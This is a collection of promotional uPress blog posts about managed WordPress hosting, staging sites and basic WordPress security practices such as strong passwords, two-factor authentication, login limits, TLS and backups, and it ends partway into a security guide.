If you are a WordPress beginner you might be wondering, what is managed WordPress hosting?

Managed WordPress hosting is a hosting service that manages all the technical aspects of your WordPress site. The goal of managed WordPress hosting is to have WordPress experts support you in the areas you need extra help so you can focus on the parts of your business, blog or project that you know and love. Think of it as your own personal IT department.

Click here to see what sets managed WordPress hosting apart

Some of the services included in managed WordPress hosting are:

• WordPress theme, core, and plugin updates
• Regular site backups
• Fine-tuning site performance and speed
• Scanning for malware and other security issues
• Quickly creating new websites
• Building and managing staging sites
• Website migration

What sets managed WordPress hosting apart from regular hosting?

WordPress is your website host, meaning the server and physical location of your website. While WordPress is responsible for managing the overall maintenance of the server, they do not cover the individual technical needs of your personal WordPress site.

Managed WordPress hosting, on the other hand, means that the host takes care of all your website's technical needs. Keep in mind that not all website hosting is managed hosting, so unless you are paying specifically for a managed WordPress hosting service, it is probably not included.

If you have read about different types of website hosting, you may have come across shared hosting as a lower-cost option. Why go with managed WordPress hosting if it costs more? The short answer is, you get what you pay for.

Shared website hosting features websites on all different platforms, not just WordPress, which means that in order to accommodate everyone, the hosting environment needs to be simplified. This can pose a number of issues from potential security risks to your site running slowly, depending on the other sites sharing your host.

Unlike shared website hosting, managed WordPress hosting is designed to handle WordPress sites specifically, which allows for greater customization and understanding of your exact technical needs.

Do you need managed WordPress hosting?

Managed WordPress hosting is a great service, but whether or not you need it is dependent on how much traffic your WordPress site gets, how much technical knowledge you have and how much time and money you have at your disposal. If you are a serious techie or on a tight budget, managed WordPress hosting may not be for you.

For owners of small businesses or high traffic blogs looking to expand and lack the time or technical skills to deal with all that comes with running a WordPress website, Managed WordPress hosting is a great resource.

Managed WordPress hosting may be more costly than other options, but if you factor in potential website crashes and security breaches that could affect business, it is a service that pretty much pays for itself. Not to mention the added stress relief of knowing your WordPress site is in good hands.

The pros and cons of managed WordPress hosting

If you are on the fence about whether or not you need managed WordPress hosting, weighing the pros and cons might help you make an informed decision.

Pros

• Increased website security
• Managed WordPress expert support
• Lightning speed
• Free dev tools/staging site
• Automatic updates/backups

Cons

• Price
• Limited to WordPress sites, does not support external non-WordPress code
• Email service and domain names not always included

Advantages of using managed WordPress hosting

Still not sure if managed WordPress hosting is for you? Let's break down some of the services included in managed WordPress hosting to help you make up your mind.

Lightning speed

Managed WordPress hosting servers are built to handle high levels of traffic, meaning as your business grows, it will not be at the cost of your site's speed. So feel free to scale up without worrying about slowing down.

Expert Support

Managed WordPress hosting means having your own team of WordPress experts at your service at all times. Unlike shared hosts, these experts know WordPress front to back and can advise you on all things tech. No longer will you be left wondering how to fix a bug or which plugins to avoid, your personal managed WordPress council has you covered.

Automatic updates and backups

Managed WordPress hosting teams are constantly figuring out how to best optimize your site via proxy content distribution network (CDN) centers and server-level caching, so you don't have to worry about staying on top of the latest plugins for site-level caching. They can also help you remove unnecessary plugins, which means lower security risks.

Managed WordPress hosting should also include automatic backups to ensure your peace of mind every step of the way.

Security

Managed WordPress hosting increases security on your site to the point that a hacking attempt is basically just a waste of time. Managed WordPress hosting provides features including but not limited to active spyware and malware scanning that help boost security specifically in areas of weakness that hackers know to look for on WordPress.

As mentioned above, managed WordPress hosting also ensures that your WordPress core, theme, plugins, etc. are all up to date, which is also extremely important to your site's security. On the off chance that a hacker is somehow able to bypass all of these measures, your managed WordPress hosting team will help you through the recovery process.

Development Tools

Managed WordPress hosting includes tools that help you to best develop your site. These tools may differ depending on your host, but one example of a dev tool is a WordPress staging site which is basically a clone of your website where you can test out different themes and design features before taking them live.

Additional benefits

While we covered some of the top benefits of managed WordPress hosting, you can also look forward to many other perks from tools that help you monitor web traffic and customer behavior, to simple website conversion, among many others. Managed WordPress hosting ultimately allows you to scale your business by providing you the best support and tools to do so.

What is the cost of managed WordPress hosting?

What is managed WordPress hosting going to cost? Managed WordPress hosting does cost more than unmanaged hosting, but the service you receive with managed WordPress hosting is at least equal to that of a system admin or tech support, which you would likely need to hire without WordPress experience.

Service admins, as opposed to managed WordPress hosting experts, generally do not have the same level of experience with WordPress specifically. This means that plugin updates and overall maintenance will still likely be left to you, which takes time and leaves room for error. Even one site crash or security issue could end up costing you more than managed WordPress hosting.

Managed WordPress hosting also ultimately allows you to scale your website by providing you the best support and tools to grow your business in ways that would take much more time and effort on your own. Think of managed WordPress hosting as a shortcut to a successful web presence, which we all know can’t be bad for business.

As managed WordPress hosting experts, we know what we're talking about, whether you need advice on the pros and cons of regular vs. managed hosting, you want to know which plugins are critical, or you're finding that your site is slow and you need help troubleshooting. You can trust us with the entire gamut of WordPress questions, so the only one left is... why aren't we hosting your WordPress site yet?

Click here to see what sets managed WordPress hosting apart

The post Managed WordPress Hosting appeared first on uPress.

Setting up a staging site (essentially a clone of your site) is a great way to test changes before taking them live. A WordPress sandbox is a staging environment in which you can modify your site freely without worrying about a mistake negatively affecting your site availability or your business.

Discover your personal WordPress sandbox today - click here

Let's take a look at everything you need to know about WordPress sandbox to get you on track to start innovating.

Dangers to look out for when you make changes on a live site

Even the smallest tweaks on a WordPress site can have a big impact. Until you test these changes, you can't be sure how they will affect your site. Whether you are updating plugins or trying out a new theme, one wrong move can lead an entire site to crash. A site crash may be the worst-case scenario, but there are a number of other risks involved in implementing changes before testing them.

Some other potential consequences of working on your WordPress site in a live environment are:

• Broken website design
• Drop in search engine ranking
• Slow website load speed
• Loss of visitors and potential business
• Putting sensitive information at risk of exposure

WordPress website management is much more difficult when you do not know the potential issues that may arise with each adjustment you make to your site. The risks of working on your site in a live environment definitely outweigh the rewards, which is why you should have a staging site for all your WordPress development.

What is a staging site?

A staging site, or sandbox site, is an exact copy of your WordPress site in which you can experiment with modifications before taking them live. The staging site helps you catch errors in code or simply test different design elements without modifying your actual site. Whether you want to try out a new feature, update widgets or plugins, or make a major change, the staging site provides an environment in which you can do so safely.

While some users download WordPress locally on their devices to test changes before adding them to their live site, this may not always give accurate results. Certain changes made on the local server may not run the same way on the live server, leading to unforeseen errors.

Unlike the local WordPress server, the staging site runs on the same server configuration as your live site, so you will not run into any new issues when you are ready to take the changes from the staging environment to the live environment.

In short, the WordPress sandbox or staging site is a space for you to explore new things and figure out what works best on your site.

How to set up a staging site for WordPress

There are a number of options when it comes to setting up a WordPress staging site, some of which are more complicated than others. The best solution is dependent on your level of website management expertise. We have outlined the different ways to set up a WordPress Sandbox to help you get started.

Setting up a staging site through your WordPress host

If you are using a WordPress hosting service, a staging site may be offered as part of your package. If so, this is the easiest and most reliable way to set up your staging site. As managed WordPress hosting experts at uPress, for example, we provide a built-in sandbox, so you don't have to do any of the heavy lifting.

Another advantage to this option is that once you have decided which change you would like to take live, your managed WordPress host will also ensure that this process runs smoothly. Additionally, you'll usually be able to access your staging site in one click from within your dashboard or control panel.

This sandbox option offers the most convenience and the least headache, but it may be more costly than the other sandbox options below. On the other hand, if you anyway want other features included in managed WordPress hosting, the inclusion of the sandbox may just make the deal even sweeter.

Setting up a staging site with a WordPress plugin

If you do not use a WordPress hosting service, or your hosting service does not include a staging site, there are a number of WordPress plugins that can help you create a staging site. While this may be a cheaper option, there are some downsides.

For one, if you are using a WordPress hosting service in addition to a staging plugin, there might be compatibility conflicts as the plugin will not have full access to your hosting server.

Another potential issue with using a plugin is that the data from your staging site will be saved on the plugin's server. If your site contains sensitive data, such as customer information, this option may not provide the level of security you are looking for.

If you do want to go with a WordPress plugin for your staging site, you can download one from the WordPress plugin directory. The process of creating your staging site will differ depending on which plugin you decide to download.

Set up local installation

If you would like to set up an offline staging site, local installation is an option. Keep in mind that, unlike the other options for setting up a staging site, only those with access to your computer will be able to use a local staging site.

There are multiple free applications you can download to help you set up a local hosting environment on your computer, such as Local or Bitnami. Each application will differ slightly but will walk you through the setup process once you have downloaded.

While this option is cheap, the downside is that you will have to transfer your live site to your local staging site. This means that you will have to manually add any plugins or themes that you use on your live site, which takes more time than the previous options and also needs more technical know-how.

Setting up a staging site for WordPress manually

This option is more complicated than the others and is not recommended for WordPress beginners. To manually create a WordPress staging site, you will need to create a subdomain, an FTP account, import your database and hide your staging site. If any of the steps are not completed correctly, it could cause problems on your live site, which kind of defeats the purpose of a staging site to begin with.

If you do decide to manually set up your staging site, implementing the changes to your live site later is also a lengthier process with its own set of drawbacks.

Unless you are an experienced WordPress manager, this is probably not the option for you.

Tips for best using a sandbox

Once you have chosen the best option for setting up your staging site, the fun can begin. Think of the sandbox as exactly that: a place to play on your site with whatever different themes, plugins and design ideas you want. Feel free to explore the world of WordPress and expand your site’s horizons. The WordPress sandbox protects your site from any security breaches or crashes so you can keep your site up-to-date and in line with your newest business ideas, without risking any crashes or design disasters.

Once you are ready to deploy your changes to your live site, depending on which option you are using for your staging site, you should be able to do so quickly and easily. Most WordPress hosts and some plugins allow you to deploy changes with the click of a button.

All the world's a staging site... so go became a player.

As managed WordPress hosting experts, we know what we're talking about, whether you're asking what is a WordPress sandbox, why you need it and how to use it for website management. You can trust us with the entire gamut of WordPress questions, so the only one left is... why aren't we hosting your WordPress site yet? Click below and join us.

Discover your personal WordPress sandbox today - click here

The post A WordPress Sandbox: What it is, Why You Need it and How to Use it appeared first on uPress.

Managed WordPress hosting means those tasks are dealt with by somebody else (hopefully, a managed WordPress hosting expert!). Technical maintenance jobs handled by website hosting management include:

• WordPress theme, core, and plugin updates
• Regular site backups
• Fine-tuning site performance and speed
• Scanning for malware and other security issues
• Quickly creating new websites
• Building and managing staging sites
• Website migration

Click here to get all the benefits of managed WordPress hosting

What is managed WordPress hosting vs. regular hosting?

Every website host is responsible for maintaining the server, which is the physical home of your website, but that doesn't mean they are providing managed website hosting. What is managed WordPress hosting exactly, then?

Managed website hosting essentially means that the host takes care of all your website's technical needs. If you're just paying for website hosting, without any management specified in the price, you're likely just getting unmanaged hosting.

Many website owners use shared hosting for low-cost website hosting. But that can bring security risks (for example, if one site is hacked, the others on the same server can be at risk), plus another site's increased traffic can cause your site to slow down. However, managed website hosting can refer to either shared or private website hosting.

A typical host has websites using many different platforms on the same server, so the environment has to be pretty generic. In contrast, managed website hosting offers an environment that's fully customized for the needs of WordPress websites in particular, with all systems tailored to WordPress sites.

What is managed WordPress hosting able to provide you?

There are a number of benefits to using managed WordPress hosting for your website.

Tech expertise at your fingertips

Managed WordPress hosting means you effectively have a WordPress expert at your disposal all the time. You don't need to learn the tech side of things yourself, or hire a techie every two minutes to troubleshoot a bug or handle core updates, you can just leave it to the hosting management team.

Optimized website performance

What is managed WordPress hosting management doing for your website's performance? By optimizing your website for speed at the server level, your site won't slow down when traffic levels spike, and you can scale up whenever you like without worrying about it.

Managed website hosting teams improve performance with proxy content distribution network (CDN) centers and server-level caching, so you won't break your head installing and managing plugins for site-level caching, plus the fewer plugins you have, the fewer potential back doors there are into your site.

Stronger website security

What is managed WordPress website hosting doing for your site's security? Managed hosting boosts security in numerous ways. It typically boasts features like free SSL certificates, and real-time scanning for worms, viruses, spyware, malware, spam, etc. baked into the system. Because it's for WordPress websites only, managers can optimize security features to compensate for known WordPress weaknesses.

Managed WordPress hosting ensures that your WordPress core, theme, plugins, etc. are updated promptly, closing security loopholes. If you are unlucky enough to get hacked, your managed WordPress hosting team will help you deal with it.

Staging site free of charge

Managed WordPress hosting includes a staging site that allows you to test drive different features and experiment with your website without worrying about affecting visitor experience or affecting something on your existing site.

More benefits

What else is managed WordPress hosting boasting? Other advantages to managed WordPress hosting include the option of a complete WordPress install within minutes; advanced dashboards that help you track visitor numbers and behavior; and automated daily backups that ensure that you can quickly and easily get your website back if anything goes wrong.

Do you need managed WordPress hosting?

The decision whether or not to use managed WordPress hosting depends on your specific circumstances. If you have plenty of tech know-how, and also enough time to handle ongoing maintenance and management yourself, you probably don't need managed WordPress hosting. It's also not an option for website owners on a very tight budget.

But if you don't have the time and knowledge to manage all aspects of website maintenance alone, and/or you need reliable website uptime and can't afford any downtime or glitches, then it's even odds you need managed WordPress hosting to give you peace of mind and time to dedicate to running your business.

The pros and cons of managed WordPress hosting

Pros

• Peace of mind about website security
• Dedicated customer support
• Faster website response speeds
• Free staging site
• Advanced analytics dashboards

Cons

• More expensive than unmanaged website hosting
• Only suitable for WordPress sites and can't support external non-WordPress code
• Doesn't always include domain names or email service

What is managed WordPress hosting going to cost? Is it worth it?

The short answer is Yes, and Probably yes.

What is managed WordPress hosting going to cost compared to unmanaged hosting? Managed WordPress hosting always costs more than unmanaged hosting, because you are receiving a higher level of service than with unmanaged hosting. However, you have to balance those extra few dollars a month for the service against the money you're saving from the results of unmanaged hosting.

For a start, without managed WordPress hosting you'd probably need to pay for technical support on a regular basis, or put up with the hassle of managing plugins, caching, maintenance, updates, and security trouble-shooting yourself. The cost of just one security incident a year is probably more than you'd spend on managed WordPress hosting.

With managed WordPress hosting, you can focus on building your business instead of dealing with technical issues and maintenance tasks. It gives you peace of mind while also ensuring that your site operates at optimized performance and delivers the best speeds so that visitors are always satisfied.

As managed WordPress hosting experts, we know what we're talking about, whether you need advice on the pros and cons of regular vs. managed hosting, you want to know which plugins are critical, or you’re finding that your site is slow and you need help troubleshooting. You can trust us with the entire gamut of WordPress questions, so the only one left is... why aren't we hosting your WordPress site yet?

Click here to get all the benefits of managed WordPress hosting

The post What is managed WordPress hosting? appeared first on uPress.

Of course, it's still vital for website managers to keep their WordPress sites updated, patched, and protected against cyber threats. Here are 10 of the main WordPress security vulnerabilities that hackers could target to break into your website, and suggestions for ways to strengthen them and close the wormholes.

Migrate to uPress within 24 hours

1. Vulnerable plugins 

Plugins add so much functionality to WordPress sites, but if you're not careful, they could turn into a vulnerable backdoor. There are tens of thousands of plugins and themes made by third-party developers and companies worldwide, but not all of them are equally secure or trustworthy.

It's crucial to choose plugins which are actively managed, with owners who regularly release updates and provide support. Just like core WordPress updates, plugin and theme updates help fix known WordPress security vulnerabilities, close loopholes that hackers could exploit, and make sure that your site is as secure as possible. An old plugin that no longer receives active support can therefore be an open door for hackers.

It can often be tempting to use a premium plugin or WordPress theme that's not offered through the WordPress plugin repository, but it's often a mistake. Sometimes, these premium plugins and themes aren't updated regularly, and sometimes not at all. Even when they are updated, the process is usually complicated and has to be done manually, so unless you keep on top of the updates, there's a high risk that your plugin will go un-updated.

As managed WordPress hosting experts, we highly recommend using only plugins and themes from the official WordPress plugin repository that were developed by well-known companies and are kept updated for your managed WordPress hosting or self-hosted site. This will go a long way to preventing any security issues, since these plugins and themes are thoroughly checked to make sure they don't contain any malicious code and are in line with security regulations.

2. Default passwords

Passwords are meant to protect the entrance to websites and web hosting platforms under your control, so they are often the first line of attack for hackers. One of the most common approaches is a Brute Force attack, when hackers just try out hundreds of passwords, hoping that they'll get lucky and hit on the one you used for your account. That's why it's so important to create a long and complicated password for your website. The harder it is to guess your password, the less likely it is that this kind of attack would succeed.

You'd be amazed at the number of web managers and developers who forget to change the default password on their website — and when we say website, we mean not just the WordPress site itself, but also the WordPress dashboard, FTP accounts, databases, WordPress managed hosting, the email you use to recover your site, and anything else tied to it. If you're using managed WordPress hosting, make sure that you generate a different unique password for every account. Reusing a password you've used before, or are using elsewhere, raises the risk that someone will guess it, or hack it from a different site.

Even more sites have passwords like "password", "12345678", or easy-to-guess options like birth dates, ID numbers, and phone numbers, which are always among the first that bots or hackers will try.

Many website owners don't like to use long and complicated passwords simply because they're hard to remember. A good solution is to use a complete sentence that makes sense only to you (and even misspell a word on purpose) so it's much easier to remember. These kinds of passwords are much stronger than a single-phrase password.

Another solution would be to use a password manager that generates and stores unique secure passwords. That way you only have to remember one secure password; the one for your password manager.

It's not just the password, either: you also need to pick a secure username for your managed WordPress hosting or self-hosted website. If you use "admin" as your username, you are basically doing half the job for hackers targeting your website.

3. Weak user permissions

The more people can access your WordPress dashboard, the greater the risk that someone will introduce an unsafe plugin, use a weak password, or accidentally activate infected software. It's easy to lose track of permissions if you're managing a large team of web designers, editors, SEO managers, writers, and more, but crucial to restrict access to mission-critical areas.

WordPress has a number of different user roles, each of which permits a different level of access and activity:

• Subscriber – A registered user who can only access their own personal profile.
• Contributor – A user with permission to edit and manage their own posts, but who can't publish any content.
• Author – A user with permission to edit, manage, and publish their own posts.
• Editor – A user with permission to edit, manage, and publish their own and other users' posts and pages, but without permission to access "sensitive" areas of the dashboard.
• Administrator – A user with permission to view and change all WordPress dashboard areas and every feature and option.
• Super Administrator – (Only available on Multisite installs) User with permission to access and manage all the websites on a Multisite network.

4. Unlimited login attempts

Hackers can only attempt the brute force attacks mentioned above if they have an unlimited number of opportunities to keep trying to guess your password. By default, WordPress allows unlimited login attempts from any IP address, which just makes it easier for malicious actors.

Close this WordPress security vulnerability by setting WordPress to automatically block the attacker's IP after a certain number of failed attempts. One of the easiest ways to set this up for self-hosted or managed WordPress hosting is using a plugin called Limit Login Attempts Reloaded. It's available for download from the official WordPress plugin repository.

uPress customers: The plugin WeSafe is installed by default on all the websites on our servers and performs this action.

5. Single-factor authentication

"Regular," single-factor authentication just requires anyone logging in to enter their username and password, and then they can gain entry. It means that hackers effectively only have to pass through one "gate" to enter the website and is one of the more serious WordPress security vulnerabilities.

You can make it much harder for them by activating two-factor authentication (TFA). With two-factor authentication, everyone has to enter a unique one-time code sent via email or SMS to their pre-registered account or phone number, or one that's generated on another registered device, as well as getting the right password.

One of the easier ways to do this for your managed WordPress hosting site is by using the Google Authenticator plugin that's available for download from the official WordPress repository. It offers two-factor authentication via a mobile app (note that you need to install the Authenticator app on your phone for this to work). After installing everything, you log in to your WordPress site with your username and password. You'll be requested to enter a 6 digit code from the mobile app. The code changes every 30 seconds and can be generated only on the app that is paired with your user account.

6. Sending unencrypted data

Whenever something is changed on the WordPress hosted site you manage, the data travels from one server to another, giving malicious actors an opportunity to intercept the information packets and steal the data. But if you encrypt it, using a TLS encryption certificate, they wouldn't be able to read the data even if they could capture it.

The TLS certificate is based on unique encryption keys installed on the website's server. Only your computer will be able to use those keys to decrypt the information. You can acquire a TLS certificate for free with most hosting providers, using Let's Encrypt.

Upress customers: You can install a TLS certificate from the security tab in our management panel.

7. Ignoring backdoor vulnerabilities

Backdoors are a kind of malware that hackers send out, often disguised as authentic WordPress system files, in the hopes that someone will install it on their site. Once installed, it creates a kind of wormhole that lets hackers enter the server by the backdoor (hence the name) and creep across to other sites hosted on the same server.

As well as enabling two-factor authentication, checking site permissions, and preventing unlimited login attempts, you can help protect your site from backdoor WordPress security vulnerabilities by regularly scanning it with tools like SiteCheck that detect common backdoors.

8. Malicious redirects

A malicious redirect attack is when the hacker changes some of the code in your website files, either by entering through a back door, using a rogue plugin or theme, or breaking into your server.

Disabling unlimited login attempts, ensuring your passwords are strong, and checking your permission levels can all help prevent malicious redirects. It's also a good idea to scan your site from time to time with a scanning plugin, and follow up on any alerts that you receive.

9. Permitting XML-RPC protocols

Since WordPress version 3.5, every WordPress site has XML-RPC protocol enabled by default. Although this helps connect your WordPress managed site with other applications and websites, it can also compromise your security. XML-RPC protocols allow hackers to the system.multicall function to attempt logging in with thousands of different protocols for only a small number of requests.

Disabling can be done by using the Disable XML-RPC-API plugin; by restricting access to the xmlrpc.php path at the server firewall level, or by using the .htaccess or nginx.conf file at the server level.

10. Welcoming bad bots

Many hackers use bots as "spies" to check on your website's defenses and performance before they decide to attack. As well as scoping out your site for WordPress security vulnerabilities, bad bots can drag down performance and steal bandwidth and content.

But you don't need to let them through the door. There's a list of "bad bots" on botreports.com, and you can block them from entering your site at all. Most security plugins and managed storage services already block the bots on this list, but you can be doubly safe by blocking them at the firewall; at server level with the.htaccess or nginx.conf file; or by installing the StopBadBots plugin.

UPress clients: There is an on / off button to block bad bots under the Security tab.

Stop WordPress security vulnerabilities from turning into security incidents

WordPress sites can be highly secure, as long as you take steps to prevent, address, or otherwise mitigate security vulnerabilities before hackers can take advantage of them. These 10 tips won't prevent any security incident, but they are a very good start to making your WordPress managed sites as secure as possible.

As managed WordPress hosting experts, we speak your language. We can geek out with you about security vulnerabilities, but we can also discuss HTTP2 protocol, IPv6 support, or DNS tools. You can trust us with the entire gamut of WordPress questions, so the only one left is... why aren't we hosting your WordPress site yet? Click below and join us.

Explore plans

The post Top 10 WordPress Security Vulnerabilities - and How to Protect Your Site appeared first on uPress.

Every website owner's biggest concern is securing a managed WordPress hosting website.

According to research by w3techs in March 2019, WordPress is by far the most popular Content Management System (CMS). 60.4% of websites that use a CMS use WordPress, or around 3.5% of all websites.

That means that there are millions of website owners concerned about securing their managed WordPress hosting. You've probably heard the myth that WordPress sites experience a lot of attacks and hacking opportunities because WordPress isn’t secure, but the likeliest reason is simply down to the numbers. WordPress has more reported security issues and hacked websites because it makes up such a large percentage of CMS hosted websites. This gives more incentive for hackers to search for security flaws and exploits in WordPress websites, because they have so many more potential targets.

WordPress, as a system, and especially its core files, are highly secure. They are regularly maintained and frequently updated by hundreds of programmers who are part of the open-source WordPress community. Actually, a significant proportion of WordPress security problems usually result from human error, like a managed WordPress hosting site that wasn't configured currently or WordPress sites updates that were poorly maintained.

Migrate to uPress within 24 hours

In this guide we'll discuss the best maintenance and security advice for securing your managed WordPress hosting website.

WordPress Security should be taken seriously

Fun Fact – On a weekly basis Google adds more than 20,000 websites to their blacklist for malicious content, and more than 50,000 websites for phishing.

* This guide is aimed at WordPress websites hosted on a Linux server, but maybe relevant for managed WordPress hosting on Windows servers as well.

This section is aimed at website owners using managed WordPress hosting or who are handling their own WordPress site management, and want to set everything up with the greatest possible level of security.

Choose secure themes and plugins

When your site uses managed WordPress hosting, you're benefiting from the large community of dedicated web developers who keep WordPress free and open-source. The CMS may look like a single unit, but it's actually made up of two main components:

• The core WordPress code
• Themes and plugins installed by the user

The immense success of WordPress generated a huge plugins and themes repository, made by third-party developers and companies worldwide. These plugins connect to your core WordPress site, adding features and functionality to your managed WordPress hosting site

WordPress has tens of thousands of plugins and themes. It's crucial to choose ones which are actively managed, with owners who regularly release updates and provide support. Just like core WordPress updates, plugin and theme updates help fix known security issues, close loopholes that hackers could exploit, and make sure that your site is as secure as possible. An old plugin that no longer receives active support is an open door for hackers.

* A note on premium/paid plugins and themes that are not available through the WordPress plugin repository:

Paying for a plugin or theme outside of the WordPress plugin market does not guarantee its quality and security. All too often, these premium plugins and themes aren't updated regularly, or at all. Even when they are updated, the process is usually complicated and has to be done manually.

We highly recommend using only plugins and themes from the official WordPress plugin repository that were developed by well-known companies and are kept updated, for your managed WordPress hosting or self-hosted site. This will go a long way to preventing any security issues, since these plugins and themes were thoroughly checked to make sure they don’t contain any malicious code, and are kept in line with security issues.

Select strong usernames and passwords

Picking a unique username

It’s crucial to pick a secure username for your managed WordPress hosting or self-hosted website. If you use "admin" as your username, you are basically doing half the job for hackers targeting your website.

This is probably one of the most important and easy steps you can take to secure your website and prevent unnecessary risks.

Selecting a secure password

A Brute Force attack is one of the most common hacking methods. It's when hackers just try out hundreds of passwords, hoping that they'll get lucky and hit on the one you used for your account. The harder it is to guess your password, the less likely it is that this kind of attack would succeed.

Astrovector / Shutterstock

That’s why it's so important to create a long and complicated password for your website. When we say "for your website," we mean your WordPress dashboard, your FTP accounts, databases, WordPress managed hosting, the email you use to recover your site, and anything else tied to your website. If you’re using managed WordPress hosting, make sure that you generate a different unique password for every account.

There's a surprising number of WordPress users that use phrases such as "password" or "12345678" as their password. These passwords, along with birth dates, ID numbers, and phone numbers, are easy to guess and will be among the first that bots or hackers will try.

Many website owners don't like to use long and complicated passwords simply because they're hard to remember. A good solution is to use a complete sentence that makes sense only to you (and even misspelling a word on purpose) and so it is much easier to remember. These kinds of passwords are much better than a single-phrase password (although only replacing letters with numbers is not secure enough).

Another solution would be to use a password manager that generates and stores unique secure passwords. That way you only have to remember one secure password; the one for your password manager.

If you’re composing the passwords yourself, it's recommended to use at least 8 characters, and include at least one of each of the following:

• Numbers (1-9)
• Lower case letters (a-z)
• Upper case letters (A-Z)
• Special characters (!@#$%^ etc).

Never reuse a password you’ve used in the past! The ideal password is unique and hard to guess based on easily accessed information.

Enforce strict permission management

Run a strict and clear policy with your user permissions so that only people who really need it can get access to your WordPress dashboard. If you are using managed WordPress hosting or have a large team of designers, editors, SEO managers etc. make sure you understand their roles before giving them permission to make changes to your website.

WordPress has the following user roles and their permissions:

• Subscriber – A user that is registered to your website can only access their own personal profile.
• Contributor – A user with permission to edit and manage their own posts, but who can't publish any content.
• Author – User with permission to edit, manage, and publish their own posts.
• Editor – User with permission to edit, manage, and publish their own and other users’ posts and pages, but without permission to access “sensitive” areas of the dashboard.
• Administrator – User with permission and access to view and change all WordPress dashboard areas and every feature and option.
• Super Administrator – (Only available on Multisite installs) User with permission to access and manage all the websites on a Multisite network.

* Themes and plugins can add or remove roles.

Limit the number of failed login attempts

A mentioned above, Brute Force attacks are carried out by hackers or bots trying to guess your password. If there's no restriction to the number of failed login attempts, the attacker can keep trying indefinitely until they manage to guess the correct password and access the dashboard.

When you set a limit to the number of failed login attempts before the system automatically blocks the attacker’s IP from accessing the website, you cut these attackers off from your site.
One of the easiest ways to set this up for self-hosted or managed WordPress hosting is using a plugin called Limit Login Attempts Reloaded. It’s available for download from the official WordPress plugin repository.

uPress customers: The plugin WeSafe is installed by default on all the websites on our servers and performs this action.

Enable Two-factor authentication

Two-factor authentication means that everyone logging in has to enter a unique one-time code that the WordPress site sends via email or SMS, or generates on another device. Two-factor authentication can significantly improve website security for your managed WordPress hosting site and provides an extra layer of defense.

DG-Studio / Shutterstock

One of the easier ways to do this for your managed WordPress hosting site is by using the Google Authenticator plugin that's available for download from the official WordPress repository. It offers two-factor authentication via a mobile app.

After installing everything, you log in to your WordPress site with your username and password. You'll be requested to enter a 6 digit code from the mobile app. The code changes every 30 seconds and can be generated only on the app that is paired with your user account.

Please note: In order for this to work, you must have the Authenticator app installed on your smartphone.

Encrypt your information with TLS (TLS/SSL Certificate)

When you or your managed WordPress hosting team add or alter anything on your site, the information is transferred from one server to another. Hackers could intercept that information stream and use it to steal data or hack into your site. But a TLS certificate encrypts the data so that if it was intercepted, no hacker would be able to read it.

The TLS certificate is based on unique encryption keys installed on the website’s server. Your computer can only decrypt the information using those encryption keys.
You can acquire a TLS certificate for free with most hosting providers, using Let's Encrypt.

Upress customers: You can install a TLS certificate from the security tab in our management panel.

A secure WordPress site begins with a secure setup

Data security in self-managed and managed WordPress hosting websites is a sensitive topic that should not be taken lightly, especially when you’re dealing with a website containing sensitive information. Each and every one of the tips and methods mentioned above will take you one step closer to a safe, secure website. When you begin with a secure foundation, you'll find it much easier for you or your managed WordPress hosting team to keep your site secure for the long term.

As managed WordPress hosting experts, we know what we're talking about, whether you need advice on preventative maintenance, ensuring security, or you just want to know what's slowing down your site. You can trust us with the entire gamut of WordPress questions, so the only one left is... why aren't we hosting your WordPress site yet? Click below and join us.

Explore plans

The post The Complete WordPress Security Guide Part 1 appeared first on uPress.

Security is top of the list of concerns for website owners. You want to protect your company's business data, and you need to comply with data and privacy regulations to make sure that your customers' details aren't breached.

This makes secure managed WordPress hosting a crucial issue, but there are also other steps you need to take to protect your website. We've already discussed the vital foundations that you need to lay to set up a secure website, but it doesn’t end there.

Building a secure WordPress hosting or self-managed site is the first and critical step in keeping your website protected from hackers and malicious actors, but maintenance is crucial too. This section discusses tips to help you to keep your WordPress site secure over the long term.

* This guide is aimed at WordPress websites hosted on a Linux server, but maybe relevant for secure WordPress hosting on Windows servers as well.

Keep WordPress up to date

Both your core WordPress and your plugins and themes need to be kept up to date if you want secure WordPress hosting and a safe website.

WordPress developers regularly upgrade the system to improve it in different ways. They add new features, improve its stability and performance, and enhance existing feature performance in order to stay up to date with today's standards.

Most importantly, updates also fix bugs that were found since the previous release, as well as adding proactive security fixes and improvements.

WordPress is an open-source system that is widely available online, so every security issue in older releases are well known across the internet and are easy prey for hackers who target old and out-dated software. For example, security experts Sucuri recently wrote about a security breach called XSS that was fixed by WordPress version 5.1.1. If your WordPress version is out of date, its security flaws are well known and are easier for attackers than to try and find new flaws and exploits in newer WordPress versions.

That's why it's so important to regularly update your site to the latest version of WordPress.

By default, WordPress automatically installs minor updates, but for major releases you must enable the Automatic Updates feature in the Systems Update menu.

Irina Strelnikova / Shutterstock

Additionally, you should never perform any changes to WordPress' core files for your secure WordPress hosting site. Because updating WordPress usually deletes your changes, it makes you less likely to want to carry out updates, and that will directly impact your website security and lead to potential security breaches and other issues in the future.

uPress Customers: The main dashboard shows 2 toggles for automatic updates under the WordPress tab, one for the core WordPress releases and another for plugin updates. Toggle them both to "On."

Migrate to uPress within 24 hours

Closely monitor activity on your website

Another way to ensure secure WordPress hosting for your site is to closely monitor crucial activities that happen in the management area, both in real-time and past activity. That's not something you can handle manually, so you'll need a logging plugin that'll run in the background and document every action.

When you utilize these plugins as part of your secure WordPress hosting, you’ll always be able to see which users logged on to your website, what they edited, which changes were made, what plugins were added/removed, which media files were uploaded, which configuration changes were made, and more. It helps you correct mistakes that could leave your secure WordPress hosting site vulnerable to attack, and spot suspicious behavior that could be a sign of malicious action.

To do all this, you can use the plugin ARYO Activity Log, which is available for download from the official WordPress plugin repository.

Keep regular backups

A good, trustworthy backup system is the first tool in your secure WordPress hosting arsenal against WordPress security exploits. Remember, no website is 100% secured at all times, so you need a way to fix everything if the worst should happen and your site gets hacked.

Bear in mind that government and international corporate websites are hacked into on a daily basis, so your smaller website is vulnerable too. Having an accessible backup allows you to quickly recover from a breach in your secure WordPress hosting by restoring your data from a version that is known to be secure and safe.

You can and should backup your WordPress websites in a few different places:

• At the server level. It's recommended to perform a daily backup for your secure WordPress hosting at least every 30 days, if not more often, and it's even better if the backups are stored on a different server.
• Using a trusted backup plugin. This is a less reliable option, but it can be a valid secondary backup system. There are a few free or premium plugins available, such as VaultPress or UpdraftPlus. We recommend using a plugin that can send backups to an external cloud storage service like Dropbox or One Drive.

Use the 3-2-1 rule: Keep at least 3 copies of the data, at least on 2 locations, and at least 1 copy off-site

Remove non-active plugins and themes

